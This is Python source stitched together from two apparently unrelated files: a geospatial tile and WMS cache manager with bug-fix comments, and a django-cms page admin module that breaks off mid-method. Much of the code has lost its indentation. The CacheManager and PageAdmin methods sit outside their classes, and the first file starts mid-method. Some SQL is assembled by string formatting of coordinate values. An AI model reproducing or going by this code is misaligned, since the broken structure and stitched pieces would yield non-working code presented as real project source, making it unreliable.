        conn.execute('delete from tiles where Intersects(bounds, BuildMBR({x1},{y1},{x2},{y2}))'.format(**locals()))
        conn.close()

    def fetch_data(self, fmt, width, height, bbox, srs, styles, layers, **kwargs):
        """
        Fetch the rendered map data for a particular bounding box, rendering
        and caching it on a miss.

        :param fmt: output format name (e.g. 'png')
        :param width: image width in pixels
        :param height: image height in pixels
        :param bbox: (x1, y1, x2, y2) bounding box
        :param srs: spatial reference of the request
        :param styles: style identifiers
        :param layers: layer identifiers
        :param kwargs: extra renderer options
        :return: the rendered image blob
        """
        cache_basis_for_spec = CacheManager.cache_entry_name(
            layers, srs, styles,
            bgcolor=kwargs.get('bgcolor', None),
            transparent=kwargs.get('transparent', False),
            query=kwargs.get('query', None)
        )
        filename = "{name}.{bbox}.{width}x{height}.{fmt}".format(
            name=cache_basis_for_spec,
            bbox='_'.join(str(b) for b in bbox),
            width=width,
            height=height,
            fmt=fmt
        )
        # BUG FIXES relative to the original:
        #  * the UPDATE was missing its SET keyword and targeted a nonexistent
        #    "tile_data" table (the table is "tiles"), as did the INSERT
        #  * SQL parameters must be passed as a sequence, not a bare string
        #  * the WKT polygon literal was missing its closing parenthesis
        #  * sqlite cursors are not context managers, and the INSERT was never
        #    committed
        insert_data = """
            INSERT INTO tiles (hash_key, last_use, tile_data, bounds)
            VALUES (
              ?,
              datetime('now'),
              ?,
              GeomFromText('POLYGON(({x1} {y1}, {x2} {y1}, {x2} {y2}, {x1} {y2}, {x1} {y1}))')
            )
        """.format(x1=bbox[0], y1=bbox[1], x2=bbox[2], y2=bbox[3])
        c = self.cache.cursor()
        c.execute("UPDATE tiles SET last_use = datetime('now') WHERE hash_key=?", [filename])
        c.execute('SELECT tile_data FROM tiles WHERE hash_key=?', [filename])
        row = c.fetchone()
        c.close()
        if row is not None:
            return row[0]
        from terrapyn.geocms.drivers import render
        dispatch.wms_rendered.send(CacheManager, layers=self.layers, styles=self.styles)
        tile_id, blob = render('png', width, height, bbox, self.srs, self.styles,
                               self.layers, **self.kwargs)
        d = self.cache.cursor()
        d.execute(insert_data, [filename, blob])
        self.cache.commit()
        d.close()
        return blob
class CacheManager(object):
@staticmethod
def cache_entry_name(layers, styles, srs=MBTileCache.STANDARD_SRS, bgcolor=None, transparent=True, query=None):
"""
Calculate a cache entry name based on parameters that would create a unique tile set
:param layers: a list of layer identifiers (strings)
:param srs: a spatial reference string (typically proj.4 or EPSG code)
:param styles: a list of style identifiers (strings)
:param bgcolor: a hextuple of RGB background color
:param transparent: whether or not the background is transparent
:param query: a query that limits the results
:return: a path/base_file_name string that can be used to create a set of files
"""
d = OrderedDict(layers=layers, srs=srs, styles=styles, bgcolor=bgcolor, transparent=transparent)
if query: # insert the query keys, but ensure a consistent order
keys = sorted(query.keys())
for k in keys:
d[k] = query[k]
shortname = md5()
for key, value in d.items():
shortname.update(key)
shortname.update(unicode(value))
cache_entry_basename = shortname.hexdigest()
return os.path.join(LAYER_CACHE_PATH, cache_entry_basename)
def __init__(self, layer_id_field='slug', style_id_field='slug'):
"""
Create the cache.
:param layer_id_field: the name of the attribute on the layer class that designates its id
:param style_id_field: the name of the attribute on the style class that designates its id
"""
self.cachename = os.path.join(LAYER_CACHE_PATH, 'directory.sqlite')
self.tile_caches = {}
self.wms_caches = {}
self.layer_id_field = layer_id_field
self.style_id_field = style_id_field
if os.path.exists(self.cachename):
conn = db.connect(self.cachename)
else:
conn = db.connect(self.cachename)
cursor = conn.cursor()
cursor.executescript("""
BEGIN TRANSACTION;
CREATE TABLE caches (name text PRIMARY KEY, kind text);
CREATE TABLE layers (slug text primary key, cache_name text);
CREATE TABLE styles (slug text primary key, cache_name text);
END TRANSACTION;
ANALYZE;
VACUUM;
""")
conn.commit()
self.conn = conn
@classmethod
def get(cls):
"""
Get a thread-local object for this cache manager
:return:
"""
import threading
if not hasattr(cls, '_mgr'):
cls._mgr = threading.local()
if not hasattr(cls._mgr, 'mgr'):
cls._mgr.mgr = CacheManager()
return cls._mgr.mgr
def get_tile_cache(self, layers, styles, bgcolor=None, transparent=True, query=None, srs=MBTileCache.STANDARD_SRS):
"""
Get the tile cache for a unique set of layers, styles
:param layers: a list of Layer objects (or analogues) or string layer identifiers
:param styles: a list of Style objects (or analogues) or string stylesheet identifiers
:param bgcolor: a hextuple of RGB background color
:param transparent: whether or not the background is transparent
:param query: a query that limits the results
:param srs: a spatial reference identifier or proj.4 string
:return: an MBTileCache object
"""
name = CacheManager.cache_entry_name(
layers,
srs,
styles,
bgcolor,
transparent,
query
)
c = self.conn.cursor()
c.execute("INSERT OR REPLACE INTO caches (name, kind) VALUES (:name, :kind)", {"name": name, "kind": "tile" })
for layer in layers:
c.execute("INSERT OR REPLACE INTO layers (slug, cache_name) VALUES (:layer, :name)", {
"layer": layer if isinstance(layer, basestring) else getattr(layer, self.layer_id_field),
"name": name
})
for style in styles:
c.execute("INSERT OR REPLACE INTO styles (slug, cache_name) VALUES (:style, :name)", {
"style": style if isinstance(style, basestring) else getattr(style, self.style_id_field),
"name": name
})
self.conn.commit()
if name not in self.tile_caches:
self.tile_caches[name] = MBTileCache(layers, styles,
bgcolor,
transparent,
query
)
return self.tile_caches[name]
def get_wms_cache(self, layers, srs, styles, **kwargs):
    """
    Get (creating and memoizing if necessary) the WMS results cache for a
    unique combination of layers, SRS, styles and rendering options.

    :param layers: layer objects or string layer identifiers
    :param srs: spatial reference identifier or proj.4 string
    :param styles: style objects or string stylesheet identifiers
    :keyword bgcolor: optional background color
    :keyword transparent: background transparency flag (default True)
    :keyword query: optional limiting query
    :return: a WMSResultsCache object
    """
    # Normalize the optional rendering parameters once.
    bgcolor = kwargs.get('bgcolor', None)
    transparent = kwargs.get('transparent', True)
    query = kwargs.get('query', None)

    name = CacheManager.cache_entry_name(
        layers, srs, styles,
        bgcolor=bgcolor,
        transparent=transparent,
        query=query
    )
    if name not in self.wms_caches:
        self.wms_caches[name] = WMSResultsCache(
            layers,
            styles=styles,
            srs=srs,
            bgcolor=bgcolor,
            transparent=transparent,
            query=query
        )
    return self.wms_caches[name]
def shave_caches(self, layers, bbox):
    """
    Iterate over all caches using any of the given layers and remove cached
    tiles overlapping the bounding box.

    :param layers: layer objects (or analogues) or string layer slugs
    :param bbox: a geometry whose ``extent`` bounds the area to invalidate
    """
    c = self.conn.cursor()
    cache_names = set()
    for layer in layers:
        slug = layer if isinstance(layer, basestring) else getattr(layer, self.layer_id_field)
        # BUGFIX: the original used cursor.executemany() with a SELECT,
        # which sqlite3 rejects (ProgrammingError) and which cannot return
        # rows; run one query per layer and collect distinct cache names.
        c.execute('select cache_name from layers where slug=?', (slug,))
        cache_names.update(k for (k,) in c.fetchall())
    for k in cache_names:
        # Shave each affected cache exactly once, even if several of the
        # requested layers map to the same cache.
        MBTileCache.shave_cache(k + '.mbtiles', bbox.extent)
def remove_caches_for_layer(self, layer):
    """
    Iterate over all the caches using a particular layer and burn them:
    delete every on-disk artifact and purge the bookkeeping rows.

    :param layer: a layer object (or analogue) or a string layer slug
    """
    slug = layer if isinstance(layer, basestring) else getattr(layer, self.layer_id_field)
    c = self.conn.cursor()
    c.execute('select cache_name from layers where slug=?', [slug])
    for (k,) in c.fetchall():
        # Remove every artifact a cache may have written under its name.
        for ext in ('.mbtiles', '.json', '.wmsresults', '.mml', '.xml', '.carto'):
            path = k + ext
            if os.path.exists(path):
                os.unlink(path)
        c.execute('delete from caches where name=?', [k])
        c.execute('delete from layers where cache_name=?', [k])
        c.execute('delete from styles where cache_name=?', [k])
    # BUGFIX: the original never committed, so the bookkeeping deletes could
    # be lost when the connection closed (registration paths do commit).
    self.conn.commit()
def remove_caches_for_style(self, style):
    """
    Iterate over all caches using a particular stylesheet and burn them:
    delete every on-disk artifact and purge the bookkeeping rows.

    :param style: a style object (or analogue) or a string stylesheet slug
    """
    slug = style if isinstance(style, basestring) else getattr(style, self.style_id_field)
    c = self.conn.cursor()
    c.execute('select cache_name from styles where slug=?', [slug])
    for (k,) in c.fetchall():
        # Remove every artifact a cache may have written under its name.
        for ext in ('.mbtiles', '.json', '.wmsresults', '.mml', '.xml', '.carto'):
            path = k + ext
            if os.path.exists(path):
                os.unlink(path)
        c.execute('delete from caches where name=?', [k])
        c.execute('delete from layers where cache_name=?', [k])
        c.execute('delete from styles where cache_name=?', [k])
    # BUGFIX: the original never committed, so the bookkeeping deletes could
    # be lost when the connection closed (registration paths do commit).
    self.conn.commit()
def layer_cache_size(self, layer):
    """
    Return the total on-disk size, in bytes, of the .mbtiles tilesets of
    every cache that uses the given layer.

    :param layer: a layer object (or analogue) or a string layer slug
    :return: cumulative size in bytes (0 if no tileset files exist)
    """
    slug = layer if isinstance(layer, basestring) else getattr(layer, self.layer_id_field)
    cur = self.conn.cursor()
    cur.execute('select cache_name from layers where slug=?', [slug])
    total = 0
    for (cache_name,) in cur.fetchall():
        tileset = cache_name + '.mbtiles'
        if os.path.exists(tileset):
            total += os.stat(tileset).st_size
    return total
@staticmethod
def resource_cache_size(resource):
    """
    Total on-disk tile cache size (bytes) across all layers belonging to a
    data resource.

    :param resource: a DataResource object or its string slug
    :return: cumulative size in bytes
    """
    # BUGFIX: the original was defined in the class body without ``self``
    # (and without @staticmethod), so normal attribute access produced an
    # unusable unbound method; mark it static so it is callable on the
    # class or an instance.
    from terrapyn.geocms import models as m
    slug = resource if isinstance(resource, basestring) else resource.slug
    mgr = CacheManager()
    return sum(
        mgr.layer_cache_size(layer)
        for layer in m.Layer.objects.filter(data_resource__slug=slug)
    )
@staticmethod
def remove_caches_for_resource(resource):
    """
    Iterate over all caches using a particular resource and burn them.

    :param resource: a DataResource object or its string slug
    """
    # BUGFIX: the original was defined in the class body without ``self``
    # (and without @staticmethod), so normal attribute access produced an
    # unusable unbound method; mark it static so it is callable on the
    # class or an instance. Also accept a resource object, not only a slug,
    # for consistency with resource_cache_size().
    from terrapyn.geocms import models as m
    slug = resource if isinstance(resource, basestring) else resource.slug
    mgr = CacheManager()
    for layer in m.Layer.objects.filter(data_resource__slug=slug):
        mgr.remove_caches_for_layer(layer.slug)
|
|
# -*- coding: utf-8 -*-
from cms.admin.change_list import CMSChangeList
from cms.admin.dialog.views import get_copy_dialog
from cms.admin.forms import PageForm, PageAddForm
from cms.admin.permissionadmin import (PAGE_ADMIN_INLINES,
PagePermissionInlineAdmin, ViewRestrictionInlineAdmin)
from cms.admin.views import revert_plugins
from cms.apphook_pool import apphook_pool
from cms.exceptions import NoPermissionsException
from cms.forms.widgets import PluginEditor
from cms.models import (Page, Title, CMSPlugin, PagePermission,
PageModeratorState, EmptyTitle, GlobalPagePermission)
from cms.models.managers import PagePermissionsPermissionManager
from cms.models.placeholdermodel import Placeholder
from cms.plugin_pool import plugin_pool
from cms.utils import (copy_plugins, helpers, moderator, permissions, plugins,
get_template_from_request, get_language_from_request,
placeholder as placeholder_utils, admin as admin_utils, cms_static_url)
from cms.utils.permissions import has_plugin_permission
from copy import deepcopy
from django import template
from django.conf import settings
from django.contrib import admin
from django.contrib.admin.options import IncorrectLookupParameters
from django.contrib.admin.util import unquote, get_deleted_objects
from django.contrib.sites.models import Site
from django.core.exceptions import PermissionDenied, ObjectDoesNotExist
from django.core.urlresolvers import reverse
from django.db import transaction, models
from django.forms import CharField
from django.http import (HttpResponseRedirect, HttpResponse, Http404,
HttpResponseBadRequest, HttpResponseForbidden, HttpResponseNotAllowed)
from django.shortcuts import render_to_response, get_object_or_404
from django.template.context import RequestContext
from django.template.defaultfilters import (title, escape, force_escape,
escapejs)
from django.utils.encoding import force_unicode
from django.utils.translation import ugettext, ugettext_lazy as _
from menus.menu_pool import menu_pool
import django
import inspect
# silly hack to test features/ fixme
# Sniff the signature of get_deleted_objects(): newer Django adds a trailing
# ``using`` (database alias) parameter, in which case the multi-db router is
# available; otherwise expose a falsy sentinel for callers to check.
if inspect.getargspec(get_deleted_objects)[0][-1] == 'using':
    from django.db import router
else:
    # pre-multi-db Django: no router module exists
    router = False

# When django-reversion is installed, PageAdmin (below) subclasses its
# VersionAdmin so page edits are recorded as revisions; otherwise fall back
# to the stock ModelAdmin and make the revision decorator a no-op.
if 'reversion' in settings.INSTALLED_APPS:
    import reversion
    from reversion.admin import VersionAdmin as ModelAdmin
    create_on_success = reversion.revision.create_on_success
else: # pragma: no cover
    from django.contrib.admin import ModelAdmin
    create_on_success = lambda x: x
def contribute_fieldsets(cls):
    """
    Compute and attach the change-form fieldsets for *cls* (the PageAdmin
    class), honoring the optional CMS feature flags in settings.

    Also stores the individual field groups (advanced_fields, hidden_fields,
    general_fields, ...) on the class so get_fieldsets()/get_form() can
    filter them per request later.
    """
    if settings.CMS_MENU_TITLE_OVERWRITE:
        # title and menu_title rendered side by side on one row
        general_fields = [('title', 'menu_title')]
    else:
        general_fields = ['title']
    general_fields += ['slug', ('published', 'in_navigation')]
    additional_hidden_fields = []
    advanced_fields = ['reverse_id', 'overwrite_url', 'redirect', 'login_required', 'limit_visibility_in_menu']
    template_fields = ['template']
    hidden_fields = ['site', 'parent']
    seo_fields = []
    # Optional feature flags add or remove individual fields.
    if settings.CMS_SOFTROOT:
        advanced_fields.append('soft_root')
    if settings.CMS_SHOW_START_DATE and settings.CMS_SHOW_END_DATE:
        general_fields.append(('publication_date', 'publication_end_date'))
    elif settings.CMS_SHOW_START_DATE:
        general_fields.append('publication_date')
    elif settings.CMS_SHOW_END_DATE:
        general_fields.append( 'publication_end_date')
    if settings.CMS_MODERATOR:
        additional_hidden_fields += ['moderator_state', 'moderator_message']
    if settings.CMS_SEO_FIELDS:
        seo_fields = ['page_title', 'meta_description', 'meta_keywords']
    if not settings.CMS_URL_OVERWRITE:
        advanced_fields.remove("overwrite_url")
    if not settings.CMS_REDIRECTS:
        advanced_fields.remove('redirect')
    if menu_pool.get_menus_by_attribute("cms_enabled", True):
        advanced_fields.append("navigation_extenders")
    if apphook_pool.get_apphooks():
        advanced_fields.append("application_urls")
    # NOTE: PageAdmin.get_fieldsets() pops groups by positional index (3),
    # so the ordering of the entries below is significant.
    fieldsets = [
        (None, {
            'fields': general_fields,
            'classes': ('general',),
        }),
        (_('Basic Settings'), {
            'fields': template_fields,
            'classes': ('low',),
            'description': _('Note: This page reloads if you change the selection. Save it first.'),
        }),
        (_('Hidden'), {
            'fields': hidden_fields + additional_hidden_fields,
            'classes': ('hidden',),
        }),
        (_('Advanced Settings'), {
            'fields': advanced_fields,
            'classes': ('collapse',),
        }),
    ]
    if settings.CMS_SEO_FIELDS:
        fieldsets.append((_("SEO Settings"), {
            'fields': seo_fields,
            'classes': ('collapse',),
        }))
    setattr(cls, 'fieldsets', fieldsets)
    setattr(cls, 'advanced_fields', advanced_fields)
    setattr(cls, 'hidden_fields', hidden_fields)
    setattr(cls, 'general_fields', general_fields)
    setattr(cls, 'template_fields', template_fields)
    setattr(cls, 'additional_hidden_fields', additional_hidden_fields)
    setattr(cls, 'seo_fields', seo_fields)
def contribute_list_filter(cls):
    """
    Attach the changelist filter list to *cls* (the PageAdmin class),
    including the filters for optional CMS features that are enabled.
    """
    filters = ['published', 'in_navigation', 'template', 'changed_by']
    if settings.CMS_MODERATOR:
        filters.append('moderator_state')
    if settings.CMS_SOFTROOT:
        filters.append('soft_root')
    cls.list_filter = filters
class PageAdmin(ModelAdmin):
    # Admin for CMS pages. NOTE: ``ModelAdmin`` here is reversion's
    # VersionAdmin when django-reversion is in INSTALLED_APPS (see the
    # conditional import at module level).
    form = PageForm
    # TODO: add the new equivalent of 'cmsplugin__text__body' to search_fields'
    search_fields = ('title_set__slug', 'title_set__title', 'reverse_id')
    # templates used by reversion's revision/recover views
    revision_form_template = "admin/cms/page/revision_form.html"
    recover_form_template = "admin/cms/page/recover_form.html"
    # mutated per request by get_form() (e.g. hiding 'published');
    # NOTE(review): mutable class-level state shared across requests
    exclude = []
    mandatory_placeholders = ('title', 'slug', 'parent', 'site', 'meta_description', 'meta_keywords', 'page_title', 'menu_title')
    # fields shown on the add form (referenced by add_fieldsets below)
    add_general_fields = ['title', 'slug', 'language', 'template']
    change_list_template = "admin/cms/page/change_list.html"

    # take care with changing fieldsets, get_fieldsets() method removes some
    # fields depending on permissions, but its very static!!
    add_fieldsets = [
        (None, {
            'fields': add_general_fields,
            'classes': ('general',),
        }),
        (_('Hidden'), {
            'fields': ['site', 'parent'],
            'classes': ('hidden',),
        }),
    ]

    inlines = PAGE_ADMIN_INLINES

    class Media:
        # static assets for the page admin; resolved via cms_static_url and
        # the admin media prefix
        css = {
            'all': [cms_static_url(path) for path in (
                'css/rte.css',
                'css/pages.css',
                'css/change_form.css',
                'css/jquery.dialog.css',
            )]
        }
        js = ['%sjs/jquery.min.js' % settings.ADMIN_MEDIA_PREFIX] + [cms_static_url(path) for path in [
            'js/plugins/admincompat.js',
            'js/libs/jquery.query.js',
            'js/libs/jquery.ui.core.js',
            'js/libs/jquery.ui.dialog.js',
        ]
        ]
def get_urls(self):
    """Get the admin urls.

    Prepends the CMS-specific plugin and page AJAX views to the stock
    ModelAdmin urls. Every view is wrapped in admin_site.admin_view (staff
    check) and named ``<app>_<model>_<view_function_name>``.
    """
    from django.conf.urls.defaults import patterns, url
    info = "%s_%s" % (self.model._meta.app_label, self.model._meta.module_name)
    # helper: wrap a view with the admin permission check and derive its
    # url name from the function name
    pat = lambda regex, fn: url(regex, self.admin_site.admin_view(fn), name='%s_%s' % (info, fn.__name__))

    url_patterns = patterns('',
        pat(r'copy-plugins/$', self.copy_plugins),
        pat(r'add-plugin/$', self.add_plugin),
        pat(r'edit-plugin/([0-9]+)/$', self.edit_plugin),
        pat(r'remove-plugin/$', self.remove_plugin),
        pat(r'move-plugin/$', self.move_plugin),
        pat(r'^([0-9]+)/delete-translation/$', self.delete_translation),
        pat(r'^([0-9]+)/move-page/$', self.move_page),
        pat(r'^([0-9]+)/copy-page/$', self.copy_page),
        pat(r'^([0-9]+)/change-status/$', self.change_status),
        pat(r'^([0-9]+)/change-navigation/$', self.change_innavigation),
        pat(r'^([0-9]+)/jsi18n/$', self.redirect_jsi18n),
        pat(r'^([0-9]+)/permissions/$', self.get_permissions),
        pat(r'^([0-9]+)/moderation-states/$', self.get_moderation_states),
        pat(r'^([0-9]+)/change-moderation/$', self.change_moderation),
        pat(r'^([0-9]+)/approve/$', self.approve_page), # approve page
        pat(r'^([0-9]+)/publish/$', self.publish_page), # publish page
        pat(r'^([0-9]+)/remove-delete-state/$', self.remove_delete_state),
        pat(r'^([0-9]+)/dialog/copy/$', get_copy_dialog), # copy dialog
        pat(r'^([0-9]+)/preview/$', self.preview_page), # copy dialog
        pat(r'^(?P<object_id>\d+)/change_template/$', self.change_template), # copy dialog
    )

    # custom patterns must come first so they win over the default ones
    url_patterns = url_patterns + super(PageAdmin, self).get_urls()
    return url_patterns
def redirect_jsi18n(self, request):
    """Redirect to the admin's JavaScript i18n catalog view."""
    catalog_url = reverse('admin:jsi18n')
    return HttpResponseRedirect(catalog_url)
def save_model(self, request, obj, form, change):
    """
    Move the page in the tree if neccesary and save every placeholder
    Content object.

    Handles three flavors of save: normal edit, reversion "history"
    rollback, and reversion "recover" (undelete), each needing different
    MPTT bookkeeping before the page can be saved.
    """
    target = request.GET.get('target', None)
    position = request.GET.get('position', None)

    if 'recover' in request.path:
        # Recovering a deleted page: re-insert it into the MPTT tree.
        pk = obj.pk
        if obj.parent_id:
            parent = Page.objects.get(pk=obj.parent_id)
        else:
            parent = None
        # wipe stale tree coordinates before re-inserting
        obj.lft = 0
        obj.rght = 0
        obj.tree_id = 0
        obj.level = 0
        # insert_at() computes fresh tree coordinates; pk is cleared and
        # restored around it so the row keeps its original primary key
        obj.pk = None
        obj.insert_at(parent, save=False)
        obj.pk = pk
        obj.save(no_signals=True)
        obj.save()
    else:
        if 'history' in request.path:
            # Reverting to an old version: keep the CURRENT tree position,
            # not the one stored in the revision.
            old_obj = Page.objects.get(pk=obj.pk)
            obj.level = old_obj.level
            obj.parent_id = old_obj.parent_id
            obj.rght = old_obj.rght
            obj.lft = old_obj.lft
            obj.tree_id = old_obj.tree_id
        force_with_moderation = target is not None and position is not None and \
            moderator.will_require_moderation(target, position)

        obj.save(force_with_moderation=force_with_moderation)

    if 'recover' in request.path or 'history' in request.path:
        # drop stale moderation state and restore the revision's plugins
        obj.pagemoderatorstate_set.all().delete()
        if settings.CMS_MODERATOR:
            from cms.utils.moderator import page_changed
            page_changed(obj, force_moderation_action=PageModeratorState.ACTION_CHANGED)
        revert_plugins(request, obj.version.pk, obj)

    language = form.cleaned_data['language']

    if target is not None and position is not None:
        try:
            target = self.model.objects.get(pk=target)
        except self.model.DoesNotExist:
            # invalid move target: save in place
            pass
        else:
            obj.move_to(target, position)

    # persist the language-specific Title fields from the form
    Title.objects.set_or_create(
        request,
        obj,
        form,
        language,
    )

    # is there any moderation message? save/update state
    if settings.CMS_MODERATOR and 'moderator_message' in form.cleaned_data and \
        form.cleaned_data['moderator_message']:
        moderator.update_moderation_message(obj, form.cleaned_data['moderator_message'])

    if obj and "reversion" in settings.INSTALLED_APPS:
        helpers.make_revision_with_plugins(obj)
@create_on_success
def change_template(self, request, object_id):
    """
    AJAX view: switch the template of a page.

    Expects the new template name in POST['template']; the name must be one
    of settings.CMS_TEMPLATES. Returns plain "ok" on success, 400 for an
    unknown template and 403 when the user may not change the page.
    """
    page = get_object_or_404(Page, pk=object_id)
    if not page.has_change_permission(request):
        return HttpResponseForbidden(_("You have no permission to change the template"))

    to_template = request.POST.get("template", None)
    if to_template not in dict(settings.CMS_TEMPLATES):
        return HttpResponseBadRequest("template not valid")

    page.template = to_template
    page.save()
    if "reversion" in settings.INSTALLED_APPS:
        # record the template switch as a revision
        helpers.make_revision_with_plugins(page)
    return HttpResponse(str("ok"))
def get_fieldsets(self, request, obj=None):
    """
    Add fieldsets of placeholders to the list of already existing
    fieldsets.

    Also strips 'published' when the user lacks publish permission and
    hides/reorders the Advanced and SEO groups per permissions.
    """
    placeholders_template = get_template_from_request(request, obj)

    if obj: # edit
        given_fieldsets = deepcopy(self.fieldsets)
        if not obj.has_publish_permission(request):
            # 'published' is the first item of the ('published',
            # 'in_navigation') pair at index 2 of the general group
            l = list(given_fieldsets[0][1]['fields'][2])
            l.remove('published')
            given_fieldsets[0][1]['fields'][2] = tuple(l)
        # one collapsible plugin-holder group per template placeholder
        for placeholder_name in self.get_fieldset_placeholders(placeholders_template):
            name = placeholder_utils.get_placeholder_conf("name", placeholder_name, obj.template, placeholder_name)
            name = _(name)
            given_fieldsets += [(title(name), {'fields':[placeholder_name], 'classes':['plugin-holder']})]
        # NOTE: index 3 is the 'Advanced Settings' group as laid out by
        # contribute_fieldsets(); after popping it, index 3 is SEO.
        advanced = given_fieldsets.pop(3)
        if obj.has_advanced_settings_permission(request):
            given_fieldsets.append(advanced)
        if settings.CMS_SEO_FIELDS:
            seo = given_fieldsets.pop(3)
            given_fieldsets.append(seo)
    else: # new page
        given_fieldsets = deepcopy(self.add_fieldsets)

    return given_fieldsets
def get_fieldset_placeholders(self, template):
    """Return the placeholder names declared by the given template."""
    placeholder_names = plugins.get_placeholders(template)
    return placeholder_names
def get_form(self, request, obj=None, **kwargs):
    """
    Get PageForm for the Page model and modify its fields depending on
    the request.

    For an existing page: seeds the form initials from the language-specific
    Title, builds one PluginEditor widget per template placeholder (reading
    plugins either live or from a reversion revision when viewing
    history/recover), and drops advanced fields the user may not edit.
    For a new page: returns PageAddForm with minimal initials.

    NOTE(review): this mutates ``self.inlines`` and ``self.exclude`` —
    shared ModelAdmin instance state — per request; not thread-safe.
    """
    language = get_language_from_request(request, obj)

    if obj:
        self.inlines = PAGE_ADMIN_INLINES
        # show/hide 'published' depending on publish permission
        if not obj.has_publish_permission(request) and not 'published' in self.exclude:
            self.exclude.append('published')
        elif 'published' in self.exclude:
            self.exclude.remove('published')

        if not settings.CMS_SOFTROOT and 'soft_root' in self.exclude:
            self.exclude.remove('soft_root')

        form = super(PageAdmin, self).get_form(request, obj, **kwargs)
        version_id = None
        versioned = False
        if "history" in request.path or 'recover' in request.path:
            # viewing a reversion revision: plugin data must come from the
            # serialized revision, not the live database
            versioned = True
            version_id = request.path.split("/")[-2]
    else:
        self.inlines = []
        form = PageAddForm

    if obj:
        try:
            title_obj = obj.get_title_obj(language=language, fallback=False, version_id=version_id, force_reload=True)
        except:
            # NOTE(review): bare except — presumably covers "no title for
            # this language"; falls back to an empty title
            title_obj = EmptyTitle()
        if form.base_fields['site'].initial is None:
            form.base_fields['site'].initial = obj.site
        # seed the Title-backed fields from the resolved title object
        for name in ['slug',
            'title',
            'application_urls',
            'redirect',
            'meta_description',
            'meta_keywords',
            'menu_title',
            'page_title']:
            form.base_fields[name].initial = getattr(title_obj, name)
        if title_obj.overwrite_url:
            form.base_fields['overwrite_url'].initial = title_obj.path
        else:
            form.base_fields['overwrite_url'].initial = ""
        if settings.CMS_TEMPLATES:
            selected_template = get_template_from_request(request, obj)
            template_choices = list(settings.CMS_TEMPLATES)
            form.base_fields['template'].choices = template_choices
            form.base_fields['template'].initial = force_unicode(selected_template)

            # one PluginEditor pseudo-field per placeholder of the template
            placeholders = plugins.get_placeholders(selected_template)
            for placeholder_name in placeholders:
                plugin_list = []
                show_copy = False
                copy_languages = {}
                if versioned:
                    # rebuild placeholder + plugin objects from the revision
                    from reversion.models import Version
                    version = get_object_or_404(Version, pk=version_id)
                    installed_plugins = plugin_pool.get_all_plugins()
                    plugin_list = []
                    actual_plugins = []
                    bases = {}
                    revs = []
                    for related_version in version.revision.version_set.all():
                        try:
                            rev = related_version.object_version
                        except models.FieldDoesNotExist:
                            # in case the model has changed in the meantime
                            continue
                        else:
                            revs.append(rev)
                    # find the serialized Placeholder matching this slot
                    for rev in revs:
                        pobj = rev.object
                        if pobj.__class__ == Placeholder:
                            if pobj.slot == placeholder_name:
                                placeholder = pobj
                                break
                    # collect top-level plugins for this placeholder/language
                    for rev in revs:
                        pobj = rev.object
                        if pobj.__class__ == CMSPlugin:
                            if pobj.language == language and pobj.placeholder_id == placeholder.id and not pobj.parent_id:
                                if pobj.get_plugin_class() == CMSPlugin:
                                    plugin_list.append(pobj)
                                else:
                                    bases[int(pobj.pk)] = pobj
                        if hasattr(pobj, "cmsplugin_ptr_id"):
                            actual_plugins.append(pobj)
                    # pair each concrete plugin with its CMSPlugin base row
                    for plugin in actual_plugins:
                        if int(plugin.cmsplugin_ptr_id) in bases:
                            bases[int(plugin.cmsplugin_ptr_id)].placeholder = placeholder
                            bases[int(plugin.cmsplugin_ptr_id)].set_base_attr(plugin)
                            plugin_list.append(plugin)
                else:
                    # live page: read plugins from the database and offer
                    # copying from other languages that have content
                    placeholder, created = obj.placeholders.get_or_create(slot=placeholder_name)
                    installed_plugins = plugin_pool.get_all_plugins(placeholder_name, obj)
                    plugin_list = CMSPlugin.objects.filter(language=language, placeholder=placeholder, parent=None).order_by('position')
                    other_plugins = CMSPlugin.objects.filter(placeholder=placeholder, parent=None).exclude(language=language)
                    dict_cms_languages = dict(settings.CMS_LANGUAGES)
                    for plugin in other_plugins:
                        if (not plugin.language in copy_languages) and (plugin.language in dict_cms_languages):
                            copy_languages[plugin.language] = dict_cms_languages[plugin.language]

                language = get_language_from_request(request, obj)
                if copy_languages and len(settings.CMS_LANGUAGES) > 1:
                    show_copy = True
                widget = PluginEditor(attrs={
                    'installed': installed_plugins,
                    'list': plugin_list,
                    'copy_languages': copy_languages.items(),
                    'show_copy': show_copy,
                    'language': language,
                    'placeholder': placeholder
                })
                form.base_fields[placeholder.slot] = CharField(widget=widget, required=False)
    else:
        # new page: blank title/slug, seed parent/site/template initials
        for name in ['slug','title']:
            form.base_fields[name].initial = u''
        form.base_fields['parent'].initial = request.GET.get('target', None)
        form.base_fields['site'].initial = request.session.get('cms_admin_site', None)
        form.base_fields['template'].initial = settings.CMS_TEMPLATES[0][0]

    if obj and not obj.has_advanced_settings_permission(request):
        for field in self.advanced_fields:
            del form.base_fields[field]

    return form
# remove permission inlines, if user isn't allowed to change them
def get_formsets(self, request, obj=None):
    """Yield inline formsets, skipping page-permission inlines the current
    user is not allowed to edit (view-restriction inlines always pass)."""
    if obj:
        for inline in self.inline_instances:
            if settings.CMS_PERMISSION and isinstance(inline, PagePermissionInlineAdmin) and not isinstance(inline, ViewRestrictionInlineAdmin):
                if "recover" in request.path or "history" in request.path: #do not display permissions in recover mode
                    continue
                if obj and not obj.has_change_permissions_permission(request):
                    continue
                elif not obj:
                    # NOTE(review): unreachable — the enclosing ``if obj:``
                    # guarantees obj is truthy here
                    try:
                        permissions.get_user_permission_level(request.user)
                    except NoPermissionsException:
                        continue
            yield inline.get_formset(request, obj)
def add_view(self, request, form_url='', extra_context=None):
    """
    The admin 'add page' view; enriches the template context with the
    request language and, under moderation, whether the chosen insertion
    point requires approval.
    """
    extra_context = extra_context or {}
    params = request.GET
    if settings.CMS_MODERATOR and 'target' in params and 'position' in params:
        moderation_required = moderator.will_require_moderation(
            params['target'], params['position']
        )
        extra_context.update({
            'moderation_required': moderation_required,
            'moderation_level': _('higher'),
            'show_save_and_continue':True,
        })
    extra_context.update({
        'language': get_language_from_request(request),
    })
    return super(PageAdmin, self).add_view(request, form_url, extra_context)
def change_view(self, request, object_id, extra_context=None):
    """
    The 'change' admin view for the Page model.

    Builds the moderation/permission context used by the custom change-form
    template and keeps the active language tab across the post-save
    redirect by appending ?language=... to it.
    """
    try:
        obj = self.model.objects.get(pk=object_id)
    except self.model.DoesNotExist:
        # Don't raise Http404 just yet, because we haven't checked
        # permissions yet. We don't want an unauthenticated user to be able
        # to determine whether a given object exists.
        obj = None
    else:
        selected_template = get_template_from_request(request, obj)
        moderation_level, moderation_required = moderator.get_test_moderation_level(obj, request.user)

        # if there is a delete request for this page
